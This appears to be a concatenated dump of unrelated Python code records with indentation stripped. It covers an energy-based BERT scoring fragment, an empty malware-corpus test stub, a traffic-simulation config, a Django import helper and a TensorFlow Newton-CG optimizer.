# f_input_mask = tf.cast(tf.expand_dims(input_mask, axis=-1), tf.float32)
if kargs.get("energy_pooling", "mi") == "mean_pooling":
tf.logging.info("==apply mean pooling to get hidden states projections==")
# for input token sequence: <start> a b c
# we only calculate energy on a,b,c which <start> can't contribute to final
# energy function
# batch x dim
pool_features = tf.einsum("abc,ab->ac", input_tensor[:, 1:], tf.cast(input_mask[:, 1:], tf.float32))
pool_features /= (1e-10+tf.reduce_sum(tf.cast(input_mask[:, 1:], tf.float32), axis=1, keepdims=True))
# tf.reduce_sum(input_tensor*f_input_mask, axis=1) #/ (1e-10+tf.reduce_sum(f_input_mask, axis=1))
print(pool_features.get_shape(), "===pool_features shape===")
elif kargs.get("energy_pooling", "mi") == "mi":
tf.logging.info("==apply mi to get hidden states projections==")
# input_tensor_norm = tf.expand_dims(tf.sqrt(tf.reduce_sum(tf.pow(input_tensor, 2), axis=-1))+1e-20, axis=-1)
# input_tensor = input_tensor / tf.stop_gradient(input_tensor_norm)
# output_weights_norm = tf.expand_dims(tf.sqrt(tf.reduce_sum(tf.pow(output_weights, 2), axis=-1))+1e-20, axis=-1)
# output_weights = output_weights / tf.stop_gradient(output_weights_norm)
# we calculate cosine distance to make mi bounded by [-1, 1]
logits = tf.einsum("abc,dc->abd", input_tensor, output_weights) # batch x seq x vocab
logits = tf.nn.bias_add(logits, output_bias)
input_id_shape = bert_utils.get_shape_list(input_ids, [2,3])
if len(input_id_shape) == 2:
onehot_input_ids = tf.cast(tf.one_hot(tf.cast(input_ids, tf.int32), config.vocab_size), tf.float32) # batch x seq x vocab
input_ori_ids = tf.cast(onehot_input_ids, tf.float32)
print("==input ori ids shape== 2-dim", input_ori_ids.get_shape())
else:
input_ori_ids = tf.cast(input_ids, tf.float32)
print("==input ori ids shape== 3-dim", input_ori_ids.get_shape())
logits = tf.einsum("abd,abd->ab", logits, input_ori_ids)
print(logits.get_shape(), "==pooled logits shape==")
# with l2-normalize, we can bound logits to 1
pool_features = tf.reduce_sum(logits[:, 1:]*tf.cast(input_mask[:, 1:], tf.float32), axis=1) #/ (1e-10+tf.reduce_sum(tf.cast(input_mask[:, 1:], tf.float32), axis=1))
pool_features = tf.expand_dims(pool_features, axis=-1)
print(pool_features.get_shape(), "==pooled feature shape==")
if kargs.get("softplus_features", False):
# when pooled_features is to infinite, it converges to 0
# when is to minus inifinite, it will converges to inifite
pool_features = tf.nn.softplus(-pool_features)
tf.logging.info("****** apply softplus transformation for pooled_features *******")
elif kargs.get("energy_pooling", "mi") == "cls":
with tf.variable_scope("transform"):
pool_features = tf.layers.dense(
input_tensor,
units=1,
use_bias=False,
activation=None
)
tf.logging.info("****** apply linear transformation for pooled_features *******")
# batch_size x hidden_dims
if kargs.get('transform', True):
if kargs.get("transformer_activation", "none") == 'softplus':
with tf.variable_scope("transform"):
ebm_scalar = tf.layers.dense(
pool_features,
units=1,
use_bias=True,
activation=tf.nn.softplus # mask scalar to [0,inifite]
)
tf.logging.info("****** apply softplus *******")
elif kargs.get("transformer_activation", "none") == 'linear':
tf.logging.info("****** apply linear projection *******")
with tf.variable_scope("transform"):
ebm_scalar = tf.layers.dense(
pool_features,
units=1,
use_bias=True,
activation=None # mask scalar to [0,inifite]
)
else:
with tf.variable_scope("transform"):
feature_shape = bert_utils.get_shape_list(pool_features, expected_rank=[1,2])
pool_features = tf.layers.dense(
pool_features,
units=feature_shape[-1],
activation=tf.nn.relu,
)
output_weights = tf.get_variable(
"output_weights", [config.max_position_embeddings, feature_shape[-1]],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [config.max_position_embeddings],
initializer=tf.constant_initializer(-np.log(np.arange(config.max_position_embeddings).astype(np.float32)+1.0), dtype=tf.float32)
)
# batch x max_position_embeddings
ebm_scalar_pos = tf.nn.relu(tf.matmul(pool_features, output_weights, transpose_b=True)) + output_bias
pos_tensor = tf.cast(tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1), tf.int32)
onehot_pos = tf.cast(tf.one_hot(tf.cast(pos_tensor, tf.int32), config.max_position_embeddings), tf.float32) # batch x seq x vocab
ebm_scalar = tf.einsum("ab,ab->a", ebm_scalar_pos, onehot_pos)
ebm_scalar = tf.expand_dims(ebm_scalar, axis=-1)
tf.logging.info("****** apply linear projection *******")
print("===ebm_scalar====", ebm_scalar.get_shape())
ebm_scalar = tf.squeeze(ebm_scalar, axis=-1)
print("===ebm_scalar====", ebm_scalar.get_shape())
# ebm_scalar /= (1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
# if kargs.get("energy_pooling", "mi") == "mean_pooling":
print("===ebm_scalar====", ebm_scalar.get_shape())
print("===input_normalized_constant====", input_normalized_constant.get_shape())
else:
ebm_scalar = tf.squeeze(pool_features, axis=-1)
# ebm_scalar /= (1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
print("===ebm_scalar====", ebm_scalar.get_shape())
print("===input_normalized_constant====", input_normalized_constant.get_shape())
if not kargs.get("prob_ln", False):
tf.logging.info("****** sum of plogprob as sentence probability *******")
# ebm_scalar /= (1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
else:
ebm_scalar /= (1e-10+tf.reduce_sum(tf.cast(input_mask[:, 1:], tf.float32), axis=-1))
tf.logging.info("****** sum of plogprob with length normalization as sentence probability *******")
print("===ebm_scalar====", ebm_scalar.get_shape())
print("===input_normalized_constant====", input_normalized_constant.get_shape())
# original ebm log-likelihood:
# log(exp(-E(x))/Z) = -E(x) - log(Z)
# here we use bert encoder of pooled hidden states as energy function which need to minus when apply to
# actual energy function
if not kargs.get("use_tpu", False):
tf.summary.scalar('ebm_scalar',
tf.reduce_mean(ebm_scalar))
if kargs.get("logz_mode", "default") == 'default':
tf.logging.info("****** default logz *******")
logits = -ebm_scalar - input_normalized_constant - tf.log(1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
elif kargs.get("logz_mode", "default") == 'standard':
logits = ebm_scalar - input_normalized_constant
tf.logging.info("****** standard logz *******")
elif kargs.get("logz_mode", "default") == 'standard_minus':
tf.logging.info("****** minus standard logz *******")
logits = -ebm_scalar - input_normalized_constant
elif kargs.get("logz_mode", "default") == 'constant':
logits = -ebm_scalar - tf.log(1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
tf.logging.info("****** constant logz *******")
elif kargs.get("logz_mode", "self_normalizing") == 'self_normalizing':
logits = -ebm_scalar
tf.logging.info("****** self_normalizing *******")
elif kargs.get("logz_mode", "none") == 'none':
logits = ebm_scalar
tf.logging.info("****** none logz *******")
else:
tf.logging.info("****** linear logz *******")
logits = ebm_scalar - input_normalized_constant * tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1)
print("=ebm logits shape==", logits.get_shape())
return logits
|
471190
|
import os
from polyswarmclient.corpus import DownloadToFileSystemCorpus
def test_download_truth_artifact():
pass
# d = DownloadToFileSystemCorpus()
# t = d.download_truth()
# assert os.path.exists(d.truth_db_pth)
def test_download_raw_artifacts():
pass
# d = DownloadToFileSystemCorpus()
# d.download_and_unpack()
# assert d.get_malicious_file_list()
# assert d.get_benign_file_list()
# d.generate_truth()
# assert os.path.exists(d.truth_db_pth)
|
471238
|
from simulation.speedLimits import *
from simulation.trafficGenerators import *
maxFps= 40
size = width, heigth = 1280, 720
# in miliseconds
updateFrame = 500
seed = None
lanes = 3
length = 300
maxSpeed = 5
speedLimits = [ SpeedLimit(range=((150,0),(300,0)), limit=0, ticks=0), SpeedLimit(range=((220, 2), (300,2)), limit=0, ticks=0) ]
trafficGenerator = SimpleTrafficGenerator(2)
slowDownProbability, laneChangeProbability = 0.15, 0.2
|
471272
|
import importlib
from admino.serializers import FormSerializer
from django.forms import BaseForm
from django.utils.functional import Promise
from django.utils.encoding import force_unicode
def import_from_string(module_path):
"""
Attempt to import a class from a string representation.
"""
try:
parts = module_path.split('.')
module_path, class_name = '.'.join(parts[:-1]), parts[-1]
module = importlib.import_module(module_path)
return getattr(module, class_name)
except (ImportError, AttributeError) as e:
msg = 'Could not import "%s" for Admino setting' % module_path
raise ImportError(msg)
|
471284
|
import pdb
import tensorflow as tf
import time
import numpy as np
import os
import math
from utilities import predict
def Rop(f, weights, v):
"""Implementation of R operator
Args:
f: any function of weights
weights: list of tensors.
v: vector for right multiplication
Returns:
Jv: Jaccobian vector product, length same as
the number of output of f
"""
if type(f) == list:
u = [tf.zeros_like(ff) for ff in f]
else:
u = tf.zeros_like(f) # dummy variable
g = tf.gradients(ys=f, xs=weights, grad_ys=u)
return tf.gradients(ys=g, xs=u, grad_ys=v)
def Gauss_Newton_vec(outputs, loss, weights, v):
"""Implements Gauss-Newton vector product.
Args:
loss: Loss function.
outputs: outputs of the last layer (pre-softmax).
weights: Weights, list of tensors.
v: vector to be multiplied with Gauss Newton matrix
Returns:
J'BJv: Guass-Newton vector product.
"""
# Validate the input
if type(weights) == list:
if len(v) != len(weights):
raise ValueError("weights and v must have the same length.")
grads_outputs = tf.gradients(ys=loss, xs=outputs)
BJv = Rop(grads_outputs, weights, v)
JBJv = tf.gradients(ys=outputs, xs=weights, grad_ys=BJv)
return JBJv
class newton_cg(object):
def __init__(self, config, sess, outputs, loss):
"""
initialize operations and vairables that will be used in newton
args:
sess: tensorflow session
outputs: output of the neural network (pre-softmax layer)
loss: function to calculate loss
"""
super(newton_cg, self).__init__()
self.sess = sess
self.config = config
self.outputs = outputs
self.loss = loss
self.param = tf.compat.v1.trainable_variables()
self.CGiter = 0
FLOAT = tf.float32
model_weight = self.vectorize(self.param)
# initial variable used in CG
zeros = tf.zeros(model_weight.get_shape(), dtype=FLOAT)
self.r = tf.Variable(zeros, dtype=FLOAT, trainable=False)
self.v = tf.Variable(zeros, dtype=FLOAT, trainable=False)
self.s = tf.Variable(zeros, dtype=FLOAT, trainable=False)
self.g = tf.Variable(zeros, dtype=FLOAT, trainable=False)
# initial Gv, f for method minibatch
self.Gv = tf.Variable(zeros, dtype=FLOAT, trainable=False)
self.f = tf.Variable(0., dtype=FLOAT, trainable=False)
# rTr, cgtol and beta to be used in CG
self.rTr = tf.Variable(0., dtype=FLOAT, trainable=False)
self.cgtol = tf.Variable(0., dtype=FLOAT, trainable=False)
self.beta = tf.Variable(0., dtype=FLOAT, trainable=False)
# placeholder alpha, old_alpha and lambda
self.alpha = tf.compat.v1.placeholder(FLOAT, shape=[])
self.old_alpha = tf.compat.v1.placeholder(FLOAT, shape=[])
self._lambda = tf.compat.v1.placeholder(FLOAT, shape=[])
self.num_grad_segment = math.ceil(self.config.num_data/self.config.bsize)
self.num_Gv_segment = math.ceil(self.config.GNsize/self.config.bsize)
cal_loss, cal_lossgrad, cal_lossGv, \
add_reg_avg_loss, add_reg_avg_grad, add_reg_avg_Gv, \
zero_loss, zero_grad, zero_Gv = self._ops_in_minibatch()
# initial operations that will be used in minibatch and newton
self.cal_loss = cal_loss
self.cal_lossgrad = cal_lossgrad
self.cal_lossGv = cal_lossGv
self.add_reg_avg_loss = add_reg_avg_loss
self.add_reg_avg_grad = add_reg_avg_grad
self.add_reg_avg_Gv = add_reg_avg_Gv
self.zero_loss = zero_loss
self.zero_grad = zero_grad
self.zero_Gv = zero_Gv
self.CG, self.update_v = self._CG()
self.init_cg_vars = self._init_cg_vars()
self.update_gs = tf.tensordot(self.s, self.g, axes=1)
self.update_sGs = 0.5*tf.tensordot(self.s, -self.g-self.r-self._lambda*self.s, axes=1)
self.update_model = self._update_model()
self.gnorm = self.calc_norm(self.g)
def vectorize(self, tensors):
if isinstance(tensors, list) or isinstance(tensors, tuple):
vector = [tf.reshape(tensor, [-1]) for tensor in tensors]
return tf.concat(vector, 0)
else:
return tensors
def inverse_vectorize(self, vector, param):
if isinstance(vector, list):
return vector
else:
tensors = []
offset = 0
num_total_param = np.sum([np.prod(p.shape.as_list()) for p in param])
for p in param:
numel = np.prod(p.shape.as_list())
tensors.append(tf.reshape(vector[offset: offset+numel], p.shape))
offset += numel
assert offset == num_total_param
return tensors
def calc_norm(self, v):
# default: frobenius norm
if isinstance(v, list):
norm = 0.
for p in v:
norm = norm + tf.norm(tensor=p)**2
return norm**0.5
else:
return tf.norm(tensor=v)
def _ops_in_minibatch(self):
"""
Define operations that will be used in method minibatch
Vectorization is already a deep copy operation.
Before using newton method, loss needs to be summed over training samples
to make results consistent.
"""
def cal_loss():
return tf.compat.v1.assign(self.f, self.f + self.loss)
def cal_lossgrad():
update_f = tf.compat.v1.assign(self.f, self.f + self.loss)
grad = tf.gradients(ys=self.loss, xs=self.param)
grad = self.vectorize(grad)
update_grad = tf.compat.v1.assign(self.g, self.g + grad)
return tf.group(*[update_f, update_grad])
def cal_lossGv():
v = self.inverse_vectorize(self.v, self.param)
Gv = Gauss_Newton_vec(self.outputs, self.loss, self.param, v)
Gv = self.vectorize(Gv)
return tf.compat.v1.assign(self.Gv, self.Gv + Gv)
# add regularization term to loss, gradient and Gv and further average over batches
def add_reg_avg_loss():
model_weight = self.vectorize(self.param)
reg = (self.calc_norm(model_weight))**2
reg = 1.0/(2*self.config.C) * reg
return tf.compat.v1.assign(self.f, reg + self.f/self.config.num_data)
def add_reg_avg_lossgrad():
model_weight = self.vectorize(self.param)
reg_grad = model_weight/self.config.C
return tf.compat.v1.assign(self.g, reg_grad + self.g/self.config.num_data)
def add_reg_avg_lossGv():
return tf.compat.v1.assign(self.Gv, (self._lambda + 1/self.config.C)*self.v
+ self.Gv/self.config.GNsize)
# zero out loss, grad and Gv
def zero_loss():
return tf.compat.v1.assign(self.f, tf.zeros_like(self.f))
def zero_grad():
return tf.compat.v1.assign(self.g, tf.zeros_like(self.g))
def zero_Gv():
return tf.compat.v1.assign(self.Gv, tf.zeros_like(self.Gv))
return (cal_loss(), cal_lossgrad(), cal_lossGv(),
add_reg_avg_loss(), add_reg_avg_lossgrad(), add_reg_avg_lossGv(),
zero_loss(), zero_grad(), zero_Gv())
def minibatch(self, data_batch, place_holder_x, place_holder_y, mode):
"""
A function to evaluate either function value, global gradient or sub-sampled Gv
"""
if mode not in ('funonly', 'fungrad', 'Gv'):
raise ValueError('Unknown mode other than funonly & fungrad & Gv!')
inputs, labels = data_batch
num_data = labels.shape[0]
num_segment = math.ceil(num_data/self.config.bsize)
x, y = place_holder_x, place_holder_y
# before estimation starts, need to zero out f, grad and Gv according to the mode
if mode == 'funonly':
assert num_data == self.config.num_data
assert num_segment == self.num_grad_segment
self.sess.run(self.zero_loss)
elif mode == 'fungrad':
assert num_data == self.config.num_data
assert num_segment == self.num_grad_segment
self.sess.run([self.zero_loss, self.zero_grad])
else:
assert num_data == self.config.GNsize
assert num_segment == self.num_Gv_segment
self.sess.run(self.zero_Gv)
for i in range(num_segment):
load_time = time.time()
idx = np.arange(i * self.config.bsize, min((i+1) * self.config.bsize, num_data))
batch_input = inputs[idx]
batch_labels = labels[idx]
batch_input = np.ascontiguousarray(batch_input)
batch_labels = np.ascontiguousarray(batch_labels)
self.config.elapsed_time += time.time() - load_time
if mode == 'funonly':
self.sess.run(self.cal_loss, feed_dict={
x: batch_input,
y: batch_labels,})
elif mode == 'fungrad':
self.sess.run(self.cal_lossgrad, feed_dict={
x: batch_input,
y: batch_labels,})
else:
self.sess.run(self.cal_lossGv, feed_dict={
x: batch_input,
y: batch_labels})
# average over batches
if mode == 'funonly':
self.sess.run(self.add_reg_avg_loss)
elif mode == 'fungrad':
self.sess.run([self.add_reg_avg_loss, self.add_reg_avg_grad])
else:
self.sess.run(self.add_reg_avg_Gv,
feed_dict={self._lambda: self.config._lambda})
def _update_model(self):
update_model_ops = []
x = self.inverse_vectorize(self.s, self.param)
for i, p in enumerate(self.param):
op = tf.compat.v1.assign(p, p + (self.alpha-self.old_alpha) * x[i])
update_model_ops.append(op)
return tf.group(*update_model_ops)
def _init_cg_vars(self):
init_ops = []
init_r = tf.compat.v1.assign(self.r, -self.g)
init_v = tf.compat.v1.assign(self.v, -self.g)
init_s = tf.compat.v1.assign(self.s, tf.zeros_like(self.g))
gnorm = self.calc_norm(self.g)
init_rTr = tf.compat.v1.assign(self.rTr, gnorm**2)
init_cgtol = tf.compat.v1.assign(self.cgtol, self.config.xi*gnorm)
init_ops = [init_r, init_v, init_s, init_rTr, init_cgtol]
return tf.group(*init_ops)
def _CG(self):
"""
CG:
define operations that will be used in method newton
Same as the previous loss calculation,
Gv has been summed over batches when samples were fed into Neural Network.
"""
def CG_ops():
vGv = tf.tensordot(self.v, self.Gv, axes=1)
alpha = self.rTr / vGv
with tf.control_dependencies([alpha]):
update_s = tf.compat.v1.assign(self.s, self.s + alpha * self.v, name='update_s_ops')
update_r = tf.compat.v1.assign(self.r, self.r - alpha * self.Gv, name='update_r_ops')
with tf.control_dependencies([update_s, update_r]):
rnewTrnew = self.calc_norm(update_r)**2
update_beta = tf.compat.v1.assign(self.beta, rnewTrnew / self.rTr)
with tf.control_dependencies([update_beta]):
update_rTr = tf.compat.v1.assign(self.rTr, rnewTrnew, name='update_rTr_ops')
return tf.group(*[update_s, update_beta, update_rTr])
def update_v():
return tf.compat.v1.assign(self.v, self.r + self.beta*self.v, name='update_v')
return (CG_ops(), update_v())
def newton(self, full_batch, val_batch, saver, network, test_network=None):
"""
Conduct newton steps for training
args:
full_batch & val_batch: provide training set and validation set. The function will
save the best model evaluted on validation set for future prediction.
network: a tuple contains (x, y, loss, outputs).
test_network: a tuple similar to argument network. If you use layers which behave differently
in test phase such as batchnorm, a separate test_network is needed.
return:
None
"""
# check whether data is valid
full_inputs, full_labels = full_batch
assert full_inputs.shape[0] == full_labels.shape[0]
if full_inputs.shape[0] != self.config.num_data:
raise ValueError('The number of full batch inputs does not agree with the config argument.\
This is important because global loss is averaged over those inputs')
x, y, _, outputs = network
tf.compat.v1.summary.scalar('loss', self.f)
merged = tf.compat.v1.summary.merge_all()
train_writer = tf.compat.v1.summary.FileWriter('./summary/train', self.sess.graph)
print(self.config.args)
if not self.config.screen_log_only:
log_file = open(self.config.log_file, 'w')
print(self.config.args, file=log_file)
self.minibatch(full_batch, x, y, mode='fungrad')
f = self.sess.run(self.f)
output_str = 'initial f: {:.3f}'.format(f)
print(output_str)
if not self.config.screen_log_only:
print(output_str, file=log_file)
best_acc = 0.0
total_running_time = 0.0
self.config.elapsed_time = 0.0
total_CG = 0
for k in range(self.config.iter_max):
# randomly select the batch for Gv estimation
idx = np.random.choice(np.arange(0, full_labels.shape[0]),
size=self.config.GNsize, replace=False)
mini_inputs = full_inputs[idx]
mini_labels = full_labels[idx]
start = time.time()
self.sess.run(self.init_cg_vars)
cgtol = self.sess.run(self.cgtol)
avg_cg_time = 0.0
for CGiter in range(1, self.config.CGmax+1):
cg_time = time.time()
self.minibatch((mini_inputs, mini_labels), x, y, mode='Gv')
avg_cg_time += time.time() - cg_time
self.sess.run(self.CG)
rnewTrnew = self.sess.run(self.rTr)
if rnewTrnew**0.5 <= cgtol or CGiter == self.config.CGmax:
break
self.sess.run(self.update_v)
print('Avg time per Gv iteration: {:.5f} s\r\n'.format(avg_cg_time/CGiter))
gs, sGs = self.sess.run([self.update_gs, self.update_sGs], feed_dict={
self._lambda: self.config._lambda
})
# line_search
f_old = f
alpha = 1
while True:
old_alpha = 0 if alpha == 1 else alpha/0.5
self.sess.run(self.update_model, feed_dict={
self.alpha:alpha, self.old_alpha:old_alpha
})
prered = alpha*gs + (alpha**2)*sGs
self.minibatch(full_batch, x, y, mode='funonly')
f = self.sess.run(self.f)
actred = f - f_old
if actred <= self.config.eta*alpha*gs:
break
alpha *= 0.5
# update lambda
ratio = actred / prered
if ratio < 0.25:
self.config._lambda *= self.config.boost
elif ratio >= 0.75:
self.config._lambda *= self.config.drop
self.minibatch(full_batch, x, y, mode='fungrad')
f = self.sess.run(self.f)
gnorm = self.sess.run(self.gnorm)
summary = self.sess.run(merged)
train_writer.add_summary(summary, k)
# exclude data loading time for fair comparison
end = time.time()
end = end - self.config.elapsed_time
total_running_time += end-start
self.config.elapsed_time = 0.0
total_CG += CGiter
output_str = '{}-iter f: {:.3f} |g|: {:.5f} alpha: {:.3e} ratio: {:.3f} lambda: {:.5f} #CG: {} actred: {:.5f} prered: {:.5f} time: {:.3f}'.\
format(k, f, gnorm, alpha, actred/prered, self.config._lambda, CGiter, actred, prered, end-start)
print(output_str)
if not self.config.screen_log_only:
print(output_str, file=log_file)
if val_batch is not None:
# Evaluate the performance after every Newton Step
if test_network == None:
val_loss, val_acc, _ = predict(
self.sess,
network=(x, y, self.loss, outputs),
test_batch=val_batch,
bsize=self.config.bsize,
)
else:
# A separat test network part has not been done...
val_loss, val_acc, _ = predict(
self.sess,
network=test_network,
test_batch=val_batch,
bsize=self.config.bsize
)
output_str = '\r\n {}-iter val_acc: {:.3f}% val_loss {:.3f}\r\n'.\
format(k, val_acc*100, val_loss)
print(output_str)
if not self.config.screen_log_only:
print(output_str, file=log_file)
if val_acc > best_acc:
best_acc = val_acc
checkpoint_path = self.config.model_file
save_path = saver.save(self.sess, checkpoint_path)
print('Best model saved in {}\r\n'.format(save_path))
if val_batch is None:
checkpoint_path = self.config.model_file
save_path = saver.save(self.sess, checkpoint_path)
print('Model at the last iteration saved in {}\r\n'.format(save_path))
output_str = 'total_#CG {} | total running time {:.3f}s'.format(total_CG, total_running_time)
else:
output_str = 'Final acc: {:.3f}% | best acc {:.3f}% | total_#CG {} | total running time {:.3f}s'.\
format(val_acc*100, best_acc*100, total_CG, total_running_time)
print(output_str)
if not self.config.screen_log_only:
print(output_str, file=log_file)
log_file.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.